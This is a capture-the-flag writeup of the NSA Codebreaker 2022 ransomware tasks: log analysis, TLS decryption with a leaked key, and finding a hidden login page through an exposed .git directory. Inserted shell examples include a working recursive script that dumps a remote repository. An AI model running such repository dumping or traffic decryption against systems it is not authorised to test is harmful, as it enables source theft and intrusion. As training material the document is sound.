🔥NSA Codebreaker 2022 Writeup

Tasks Completed: 4/9

Leaderboard

UNG got 6th Place, not too bad :)

This was also a bonus challenge/extra credit opportunity for my CYBR 3800 Linux Operating Systems course!

Challenge

This year's challenge was to solve a ransomware attack. Our mission was to investigate the attack, discover the tools and techniques used, unravel and expose a ransomware-as-a-service ring, and recover the critical files to save the day.

TASK A1: Initial Access

Category: Log Analysis

Prompt

  • Enter the username which shows signs of a possible compromise.

Downloads

  • Access log from the company’s VPN server for the week in question (vpn.log)

VPN.log file analysis with awk, grep, and sort

I first downloaded the vpn.log file and cat'd its contents, but the raw output is difficult to read for analysis.

vpn.log

So, I used awk and sort to get the log into a more readable format for analysis: this way we can see all users in alphabetical order and how many times each one logged in.

using awk and sort on vpn.log, users in Alphabetical order

I also wanted to know who had failed login attempts, indicated by “invalidCredentials”.

users with failed login attempts

After a few failed submissions, I decided to exclude the users with failed login attempts and focus on the ones with successful logins: the phishing campaign was a successful one, so the compromised account should show minimal login attempts, probably one or two. I then grepped each user and analyzed them one by one. I had two incorrect submissions before I came across the right one, which stood out because of two simultaneous sessions from different IP addresses, indicating that someone else had logged in at the same time from a different IP.
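The awk/sort/grep analysis above, as an added shell example that is not from the writeup. The real vpn.log format is not shown here, so the sample lines and their key=value layout are constructed. It goes one step past the manual per-user grep: it tracks open sessions per user and flags any login that arrives while another session from a different source IP is still active, which is the tell that identified the compromised account.

```shell
#!/bin/sh
# Added example (not from the writeup). Sample log lines are constructed; the
# key=value layout is an assumption about a VPN access log, not the challenge file.
VPN_SAMPLE='2022-09-12T08:01:22Z user=alice src=203.0.113.10 event=login result=success
2022-09-12T08:05:41Z user=bob src=198.51.100.7 event=login result=invalidCredentials
2022-09-12T08:06:02Z user=bob src=198.51.100.7 event=login result=success
2022-09-12T09:14:33Z user=carol src=203.0.113.44 event=login result=success
2022-09-12T09:30:10Z user=alice src=192.0.2.99 event=login result=success
2022-09-12T10:00:00Z user=alice src=203.0.113.10 event=logout result=success
2022-09-12T11:00:00Z user=carol src=203.0.113.44 event=logout result=success
2022-09-12T11:20:15Z user=carol src=203.0.113.44 event=login result=success
2022-09-12T12:00:00Z user=alice src=192.0.2.99 event=logout result=success
2022-09-12T12:30:00Z user=bob src=198.51.100.7 event=logout result=success'

# Successful logins per user, alphabetical: the "awk | sort" step of the writeup.
login_counts() {
    printf '%s\n' "$VPN_SAMPLE" |
    awk '/event=login/ && /result=success/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^user=/) n[substr($i, 6)]++
         }
         END { for (u in n) print u, n[u] }' | sort
}

# Users with at least one failed attempt ("invalidCredentials").
failed_users() {
    printf '%s\n' "$VPN_SAMPLE" |
    awk '/result=invalidCredentials/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^user=/) print substr($i, 6)
         }' | sort -u
}

# Logins that arrive while the same user already has an open session from a
# different source IP. Sessions are keyed by (user, ip) and closed on logout.
overlapping_sessions() {
    printf '%s\n' "$VPN_SAMPLE" |
    awk '{
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^user=/)   u   = substr($i, 6)
                if ($i ~ /^src=/)    ip  = substr($i, 5)
                if ($i ~ /^event=/)  ev  = substr($i, 7)
                if ($i ~ /^result=/) res = substr($i, 8)
            }
            if (res != "success") next
            if (ev == "login") {
                for (k in active) {
                    split(k, p, SUBSEP)
                    if (p[1] == u && p[2] != ip)
                        print $1, u, ip, "while still active from", p[2]
                }
                active[u, ip] = 1
            } else if (ev == "logout") {
                delete active[u, ip]
            }
         }'
}

echo "== successful logins per user =="; login_counts
echo "== users with failed attempts =="; failed_users
echo "== logins overlapping an open session from another IP =="; overlapping_sessions
```

On the constructed sample only alice is reported: her second login (from 192.0.2.99) lands while her first session from 203.0.113.10 is still open. bob's single failed attempt shows up in the failed list but, as the writeup reasons, a failed attempt alone is not the signal; the concurrent session from a second IP is.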

User with 2 simultaneous sessions from different IP addresses
Task A1 Completed!

TASK A2: Identifying the Attacker

Category: Computer Forensics, Packet Analysis

Prompt

  • What was the username of the account the attacker used when they built their tools?

Downloads

  • Files captured from root’s home directory on the staging server (root.tar.bz2)

  • PCAP file believed to be of the attacker downloading their tools (session.pcap)

Cert.pem RSA Private Key

I first downloaded the root.tar.bz2 and session.pcap file to my Downloads folder:

  • I extracted the root.tar.bz2 archive and saved the files to my machine

  • Here we find a .cert.pem file that looks interesting and potentially useful for analyzing session.pcap in Wireshark

  • I moved it to the Desktop and renamed it “cert.pem” so that it's visible

extracting and moving files
.cert.pem

Opening the .cert.pem file with nano, we see that it is an RSA private key; maybe this will be useful to decrypt some TLS traffic in Wireshark. The .cert.pem file was not visible on the Desktop because file names that start with a dot are hidden by default, but when I renamed it to “cert.pem” it showed up.

Session.pcap: Decrypting TLS Traffic with Cert.pem RSA Private Keys

I then opened the session.pcap file in Wireshark. It looks like there is some encrypted TLS traffic. To decrypt it with what we have, we use the cert.pem file containing the RSA private key: go to Edit > Preferences > Protocols > TLS > RSA Key List and add an entry with the cert.pem file, the TLS protocol, port 443, and 172.16.01 as the IP address (the IP whose TLS traffic we want to decrypt in the pcap file).

Decrypting TLS traffic with cert.pem

We now see an interesting HTTP packet with a GET /tools.tar request. Because the traffic is now decrypted using cert.pem, following the TLS stream should reveal information about the client and server request/response and how the attacker was able to download their tools.

Interesting HTTP clear text packet "GET /tools.tar"

Right-clicking the packet and choosing Follow > TLS Stream, we now see the username the attacker used when building/downloading their tools: “HuskyWisePitch”.
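The same decryption and stream-follow done on the command line with tshark, as an added example that is not from the writeup. tshark takes the Wireshark RSA key list as the tls.keys_list preference, in the form ip,port,protocol,keyfile. The pcap path, key path and server IP in the block are placeholders for the reader's own values, and tshark must be installed.

```shell
#!/bin/sh
# Added example (not from the writeup): tshark equivalent of
# Edit > Preferences > Protocols > TLS > RSA Key List. File paths and the
# server IP are placeholders; substitute the values from your own capture.
SERVER_IP="${SERVER_IP:-192.0.2.1}"   # placeholder: the server whose key we hold

# Print the first PEM block label in a file (e.g. "RSA PRIVATE KEY"). The RSA key
# list needs a private key; a file holding only a CERTIFICATE cannot decrypt anything.
pem_block_type() {
    sed -n 's/^-----BEGIN \(.*\)-----$/\1/p' "$1" | head -n 1
}

# Build one tls.keys_list entry: ip,port,protocol,keyfile
keys_list_entry() {
    printf '%s,%s,%s,%s' "$1" "$2" "$3" "$4"
}

# List decrypted HTTP requests (source, method, URI): the "GET /tools.tar" step.
decrypt_http_requests() {   # $1 pcap, $2 server ip, $3 private key file
    tshark -r "$1" \
        -o "tls.keys_list:$(keys_list_entry "$2" 443 http "$3")" \
        -Y 'http.request' \
        -T fields -e ip.src -e http.request.method -e http.request.uri
}

# Dump the decrypted contents of one TLS stream: the "Follow > TLS Stream" step.
follow_tls_stream() {       # $1 pcap, $2 server ip, $3 private key file, $4 stream index
    tshark -r "$1" \
        -o "tls.keys_list:$(keys_list_entry "$2" 443 http "$3")" \
        -q -z "follow,tls,ascii,${4:-0}"
}

# Stand-alone use (placeholder file names): check the key type first, then decrypt.
if [ -f cert.pem ] && [ -f session.pcap ]; then
    echo "cert.pem holds: $(pem_block_type cert.pem)"
    decrypt_http_requests session.pcap "$SERVER_IP" cert.pem
    follow_tls_stream session.pcap "$SERVER_IP" cert.pem 0
fi
```

A static RSA private key only decrypts sessions negotiated with the RSA key-exchange cipher suites, which is why it worked in this capture; with (EC)DHE suites or TLS 1.3 the server's key reveals nothing, and the only way to decrypt is a per-session key log (SSLKEYLOGFILE) from one of the endpoints. From the defender's side, the lesson is the one the attacker's staging box teaches: a server private key sitting in a home directory decrypts every RSA-exchange session ever captured for that server.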

Follow > TLS Stream reveals the attacker's username, HuskyWisePitch
Task A2 Completed!

TASK B1: Information Gathering

Category: Reverse Engineering, Web Analysis

Prompt

  • Enter the domain name of the associated site

Downloads

  • Demand note from the attacker (YOUR_FILES_ARE_SAFE.txt)

YOUR_FILES_ARE_SAFE.txt demand/ransom note

For this task we have a demand/ransom note from the attacker: it looks like our files are encrypted and we must go to the linked page to find out how to recover them.

YOUR_FILES_ARE_SAFE.txt demand
https://wsntbwxbyfgfyaxv.unlockmyfiles.biz/

Inspect > Dev Tools > Network > HTTP GET Request Headers > Profit $$$

From here we can inspect the site using the browser's dev tools. In the Network tab we see an interesting GET request whose Host header points to an external site, “https://uxlnsbzrtpoawmpd.ransommethis.net/”.

external site connected to this site found in GET request Host header

We go to this site and inspect it as well; its contents are forbidden, but this is in fact the backend connected to the demand/ransom site, “https://uxlnsbzrtpoawmpd.ransommethis.net/”.

external site associated with the first site
Task B1 Completed!

TASK B2: Getting Deeper

Category: Reverse Engineering, Web Analysis

Prompt

"It looks like the backend site you discovered has some security features to prevent you from snooping. They must have hidden the login page away somewhere hard to guess. Analyze the backend site, and find the URL to the login page."

  • Enter the URL for the login page. (for the external site found in Task B1)

Exposed x-git-commit-hash

For this task we are looking for the login page, so let's inspect this site with dev tools and see what we can find by analyzing the “backend” of the site. We see a server response header “x-git-commit-hash” with a value of “a810d8632d5578670690618f391c4ea6a6d0c14a”; maybe there is a hidden “/.git” directory?

Exposed x-git-commit hash

So, I tried "https://uxlnsbzrtpoawmpd.ransommethis.net/.git/"; it looks like directory listing is disabled.

Directory listing disabled at /.git

After some research: the x-git-commit-hash value the site exposes is the hash of a git commit, the identifier recorded whenever a commit is made to a repository (which holds the developers' files, commonly on GitHub). I learned a few basic git commands (init, add, clone, commit, push, pull) and the theory of how git works. In this case all I needed was a working git repo and access to git commands for this to work. So I used an existing git repo of mine (note: you can also create your own test repo), a private repo with my pen-testing notes.

But the directory we really want is the .git directory, where git keeps its internals; there we see familiar things like HEAD, config, and objects.

.git directory, all git repos have this

For the next part we can get pieces of information either by going to the path itself in the browser or by downloading the files with curl. I went with curl to download the files for content discovery, and did this in a separate directory to keep my repo and this information separate.

Using Curl and git to extract objects from the backend site

As we can see below, we get the same x-git-commit-hash value from the .git/refs/heads/main file, but we can’t really read that object unless we use a special git command (git cat-file -p).

This is how the process goes:

  • Create a directory to store these objects using “mkdir .git/objects/a8”, a8 being the first two characters of our x-git-commit-hash.

  • Use curl to download the object for the hash and store it in the directory we created, using --output to specify where to save it.

  • Use “git cat-file -p a810d8632d5578670690618f391c4ea6a6d0c14a” to read the contents of the object.

Reading git objects using curl and git cat-file

Here we notice another object, “tree 3db88461db61f52d71247e0e320387862b560318”, along with the author and other information. To learn more about that object, we repeat the process:

  • "mkdir .git/objects/3d", 3d being the first two characters of the object hash

  • curl the contents of that object and store it in the directory we created in step one

  • "git cat-file -p <completehash>" to print its contents

Following this process, I was able to find some interesting objects; the app object could possibly contain backend files for the web application.
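Automating the mkdir / curl / git cat-file loop from the steps above, as an added example that is neither the writeup's own workflow nor the tool it alludes to at the end. It assumes curl and git are installed, that it runs inside a fresh `git init` directory (so git cat-file can read the fetched objects), and BASE is a placeholder for the exposed /.git URL. It goes beyond the one-object-at-a-time process: it parses each commit's tree id and each tree's entries and walks the whole tree recursively, and it includes the one-request check a defender would run against their own site.

```shell
#!/bin/sh
# Added example (not from the writeup): automates the mkdir / curl / git cat-file
# loop. Assumes curl and git are installed and that we are inside an empty
# `git init` directory. BASE is a placeholder for the exposed /.git URL.
BASE="${BASE:-https://PLACEHOLDER.example/.git}"

# Loose-object path for a 40-hex id: .git/objects/<first two chars>/<remaining 38>.
object_path() {
    printf '.git/objects/%s/%s' "$(printf '%s' "$1" | cut -c1-2)" "$(printf '%s' "$1" | cut -c3-)"
}

# Defender's check: does the site serve .git/HEAD? A 200 means the repository is
# exposed even with directory listing off, because object paths are predictable.
git_exposed() {
    [ "$(curl -s -o /dev/null -w '%{http_code}' "$BASE/HEAD")" = "200" ]
}

# Download one loose object into the local repo. Objects are stored zlib-compressed
# on the server exactly as git expects them, so no conversion is needed.
fetch_object() {
    p=$(object_path "$1")
    if [ -f "$p" ]; then return 0; fi
    mkdir -p "$(dirname "$p")"
    curl -sSf "$BASE/${p#.git/}" --output "$p"
}

# From `git cat-file -p <commit>` output, print the tree id.
commit_tree_id() {
    awk '$1 == "tree" { print $2; exit }'
}

# From `git cat-file -p <tree>` output ("mode type id<TAB>name"), print "type id name".
tree_entries() {
    awk -F'\t' '{ split($1, m, " "); print m[2], m[3], $2 }'
}

# Recursively fetch a tree and everything under it, printing "type id path".
walk_tree() {   # $1 tree id, $2 path prefix
    fetch_object "$1"
    git cat-file -p "$1" | tree_entries | while read -r type id name; do
        fetch_object "$id"
        printf '%s %s %s\n' "$type" "$id" "$2$name"
        if [ "$type" = "tree" ]; then walk_tree "$id" "$2$name/"; fi
    done
}

# Entry point: start from the commit id found in x-git-commit-hash (or refs/heads/main).
dump_from_commit() {
    fetch_object "$1"
    walk_tree "$(git cat-file -p "$1" | commit_tree_id)" ""
}
```

Run it as `dump_from_commit a810d8632d5578670690618f391c4ea6a6d0c14a` inside the empty repo; afterwards `git cat-file -p <blob id>` prints any file it listed, which is how server.py was read in the writeup. The mitigation is to never deploy a checkout's .git directory (deploy a build artifact instead) and, as defence in depth, deny the /.git prefix in the web server configuration; `git_exposed` is the one-line regression test for that.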

3db88461db61f52d71247e0e320387862b560318

Following the same process with "bc7c79ab860bd5b09663d08ffcc7e87c074059b5", I was able to find server.py, which contained interesting information about how the backend of the web application works.

bc7c79ab860bd5b09663d08ffcc7e87c074059b5

Opening the server.py file, it looks like the expected_pathkey() function exposes where the login page is located.

server.py

Let’s see what happens if we go to that path on the “unauthorized” site.

https://uxlnsbzrtpoawmpd.ransommethis.net/aonvykyjbhdoeruk/login

BOOM ! WE FOUND THE LOGIN PAGE

Note: this could have been much easier with this tool.

Task B2 Completed!

The End

This was my first ever NSA Codebreaker challenge 🙌. I am glad that I was able to complete a few tasks and that I was able to explore and learn new things like using awk, sort, and grep to analyze a log file, decrypting TLS traffic in Wireshark, web application analysis, and git!
